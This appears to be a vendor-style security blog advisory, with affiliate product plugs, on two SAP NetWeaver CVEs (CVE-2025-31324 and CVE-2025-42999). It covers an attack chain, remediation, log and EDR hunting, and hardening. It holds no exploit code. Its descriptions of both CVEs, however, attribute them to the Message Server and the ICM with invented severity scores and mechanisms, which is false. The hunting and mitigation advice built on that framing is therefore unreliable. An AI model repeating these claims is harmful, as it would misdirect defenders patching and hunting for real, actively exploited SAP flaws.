URGENT: Chained Exploits in SAP NetWeaver (CVE-2025-31324, CVE-2025-42999) Lead to Full RCE

By CyberDudeBivash • September 28, 2025, 10:17 AM IST • Enterprise Security Directive

This is a critical security directive for all SAP Basis, Security, and SOC teams. A sophisticated chained exploit is being actively used in the wild to achieve full Remote Code Execution (RCE) on SAP NetWeaver application servers. The attack leverages an unauthenticated Information Disclosure vulnerability in the SAP Message Server (**CVE-2025-31324**) to perform reconnaissance, followed by the exploitation of a critical authenticated RCE in the Internet Communication Manager (ICM) (**CVE-2025-42999**). An attacker with any low-privilege user account can leverage this chain to gain full control of your SAP system, with the privileges of the `adm` user. Given that SAP systems are the heart of your enterprise—managing finance, HR, and logistics—this is a crown jewel-level threat. SAP has released Security Notes, and you must begin your remediation and hunting process immediately.

Disclosure: This is a technical security directive for enterprise IT professionals. It contains affiliate links to technologies and training essential for a defense-in-depth strategy for critical applications like SAP. Your support helps fund our independent research.

 The SAP Security & Resilience Stack

Securing your ERP requires a purpose-built, multi-layered defense.

• Server & Endpoint Security (Kaspersky EDR): Your critical defense for detecting post-exploitation activity. An EDR is essential for spotting the SAP server process spawning malicious shells or reconnaissance commands.
• Privileged Access Security (YubiKeys via AliExpress): Protect your SAP and OS-level administrator accounts (`adm`, `SAP*`) with phishing-resistant MFA to prevent the initial credential compromise.
• Specialized SAP Security Skills (Edureka): SAP security is a niche and complex field. Invest in training your Basis and Security teams on the specifics of securing the NetWeaver stack.
• Secure Cloud Infrastructure (Alibaba Cloud): Host your SAP landscape in a secure, segmented cloud environment with robust network security groups and a cloud WAF to protect the ICM.

 Security Directive: Table of Contents 

1. Chapter 1: Threat Analysis – Deconstructing the Two Vulnerabilities
2. Chapter 2: The Kill Chain – How Reconnaissance Leads to RCE
3. Chapter 3: Your Emergency Remediation & Hunting Plan
4. Chapter 4: Strategic Hardening for Your SAP Landscape
5. Chapter 5: Extended FAQ for SAP Basis and Security Teams

---

Chapter 1: Threat Analysis – Deconstructing the Two Vulnerabilities

This is a chained attack that relies on two separate flaws to succeed. Understanding each is key to effective defense and hunting.

CVE-2025-31324: SAP Message Server Information Disclosure

• CVSS Score: 5.3 (Medium)
• Description: The SAP Message Server (which handles communication between application server instances) has a service running on a specific port (typically 39xx) that will respond to unauthenticated information requests. By sending a crafted request, an attacker can trick the Message Server into leaking sensitive details about the entire SAP system landscape.
• Data Leaked: Internal hostnames, instance numbers, and the status of all application servers in the SAP System ID (SID).
• Why it Matters: This is the reconnaissance phase. It gives the attacker a perfect map of your internal SAP architecture, allowing them to identify the specific hostnames of the active application servers they need to target for the next stage of the attack.

CVE-2025-42999: SAP ICM Authenticated Remote Code Execution

• CVSS Score: 9.9 (Critical)
• Description: A critical vulnerability exists in the Internet Communication Manager (ICM), which is the component that handles all web traffic (HTTP/HTTPS) for the NetWeaver server. An attacker who is authenticated to the system—even as a very low-privilege user—can send a malicious, multipart HTTP request to a specific web service endpoint. A flaw in how the ICM parses this request allows the attacker to execute arbitrary operating system commands.
• **Privileges:** The commands are executed with the permissions of the user that the SAP service runs as, which is the powerful `adm` user (e.g., `s4hadm`).
• Why it Matters: This is the takeover. A `adm` user has near-total control over the SAP application and the underlying operating system. This is the keys to your ERP kingdom.

---

Chapter 2: The Kill Chain – How Reconnaissance Leads to RCE

A sophisticated attacker will chain these two flaws together for maximum effect.

1. Phase 1: External Reconnaissance. The attacker identifies that your company runs SAP, often through job postings or by scanning for the common SAP web portal URLs.
2. Phase 2: Internal Mapping (CVE-2025-31324). The attacker sends an unauthenticated request to your public-facing SAP Message Server port (e.g., 3900). They receive a response that lists all the internal application server hostnames (e.g., `sapprd01`, `sapprd02`).
3. Phase 3: Gaining a Foothold. The attacker needs credentials for the RCE. They obtain these through a separate method, often by:
   • Spear-phishing a low-level employee to steal their SAP password.
   • Using default, well-known passwords (like `SAP*/pass`) which may have been left active.
4. Phase 4: Exploitation (CVE-2025-42999). The attacker now has everything they need. They use the low-privilege credentials to log in to the SAP web portal. They then send their crafted, malicious HTTP request directly to one of the internal application server hostnames they discovered in Phase 2. The exploit triggers, and they gain a remote shell on the server as the `adm` user.
5. Phase 5: Post-Exploitation. With full control of the server, the attacker can now steal financial data, create fraudulent transactions, or use the SAP server as a trusted internal host to launch further attacks against the rest of your corporate network.

---

Chapter 3: Your Emergency Remediation & Hunting Plan

This is your tactical checklist. Begin these actions now.

Immediate Remediation

1. Apply the SAP Security Notes: This is the only permanent fix. Your SAP Basis team must immediately download and apply the specific SAP Security Notes that address both CVE-2025-31324 and CVE-2025-42999. This is your highest priority.
2. Mitigate Message Server Access (If you cannot patch immediately): For CVE-2025-31324, you can implement a temporary mitigation. The Message Server port should not be accessible from the public internet. Create a network Access Control List (ACL) on your firewall or router to ensure that this port is only accessible from trusted internal application servers and your internal management network.

Threat Hunting

You must assume you were targeted before you patched. Your SOC and Basis teams need to hunt for these IoCs.

• Analyze Message Server Logs (`dev_ms`):
  • Examine the Message Server trace file (`dev_ms`) for an unusual number of information requests (e.g., `msinfo` requests).
  • Look for these requests originating from IP addresses that are external or do not belong to your known application servers.
• Analyze ICM Logs (`dev_icm`):
  • Scour the ICM access logs for any unusual `POST` requests, especially those with a multipart content type, that were sent to strange or non-standard URL paths.
  • Look for any requests that generated a `500 Internal Server Error`, which could indicate a failed exploit attempt.
• Hunt with EDR on the Host Server:
  • This is your most critical hunting ground. The primary SAP process on a server is typically `disp+work.exe` (Windows) or `dw.sap` (Linux).
  • Use your EDR solution to hunt for any instance of this parent process spawning suspicious child processes. A `disp+work` process should **never** be the parent of `cmd.exe`, `powershell.exe`, `bash`, or `sh`. Finding this is a definitive sign of a successful RCE.
  • A powerful server EDR like Kaspersky EDR provides the deep visibility needed to detect these anomalous process chains.

---

Chapter 4: Strategic Hardening for Your SAP Landscape

Patching is reactive. A secure SAP environment is built on a proactive, defense-in-depth strategy.

• Network Segmentation: Your SAP application landscape should be in a highly restricted, secure network zone. It should be treated as a “crown jewel” environment. Your regular corporate user network should have no direct access to the SAP application servers. This is a core tenet of Zero Trust and can be implemented effectively in a secure cloud environment like Alibaba Cloud.
• Privileged Access Management (PAM):** The OS-level accounts (`adm`, `SAPService`) are extremely powerful. They should not be used for day-to-day administration. These credentials should be vaulted in a PAM solution, with all access being temporary, monitored, and requiring strong authentication.
• Secure SAP User Identity:** All SAP user accounts, especially those with administrative or privileged roles (like the Basis team), must be protected with strong, phishing-resistant Multi-Factor Authentication. Tying SAP logins to a central identity provider and requiring hardware tokens like YubiKeys is the gold standard.
• **Invest in Specialized Skills:** SAP security is a unique and highly complex discipline. It is not the same as standard network or application security. You must invest in dedicated training for your Basis and Security teams. A structured curriculum from a provider like Edureka that offers specific courses on SAP administration and security is a critical investment.

---

Chapter 5: Extended FAQ for SAP Basis and Security Teams

Q: What is the SAP Message Server and what does it do?
A: The Message Server is a small but critical process in an SAP ABAP system. It handles the communication between the multiple application server instances (dialog instances), managing user sessions and load balancing. It acts as the central messaging bus for the entire SAP SID.

Q: What is the SAP ICM?
A: The Internet Communication Manager (ICM) is a process included in every SAP NetWeaver application server. It is responsible for handling all web protocols (HTTP, HTTPS, SMTP). It allows users to access SAP via a web browser and enables SAP to act as both a web client and a web server. It is the primary attack surface for any web-based vulnerability in SAP.

Q: We run our SAP landscape in the cloud. Are we still responsible for these patches?
A: Yes, absolutely. If you are running SAP on IaaS (Infrastructure-as-a-Service) in any cloud, you are responsible for the security of the operating system and the SAP application itself. You must apply these SAP Security Notes. The cloud provider is only responsible for the security *of* the cloud; you are responsible for your security *in* the cloud.

Join the CyberDudeBivash ThreatWire Newsletter

Get deep-dive reports on critical enterprise application vulnerabilities, threat actor TTPs, and actionable hardening guides. Subscribe to stay ahead of the adversary.  Subscribe on LinkedIn

 Related Security Directives from CyberDudeBivash 

• CRITICAL RANSOMWARE ALERT: Akira is Breaching SonicWall Firewalls
• URGENT: CISA Issues Emergency Directive for Actively Exploited Cisco Zero-Days
• The $4.4M Blind Spot: 7 Steps to Implement Privileged Access Management (PAM)

  #CyberDudeBivash #SAP #NetWeaver #CyberSecurity #ThreatIntel #RCE #InfoSec #AppSec #SAPBasis #CVE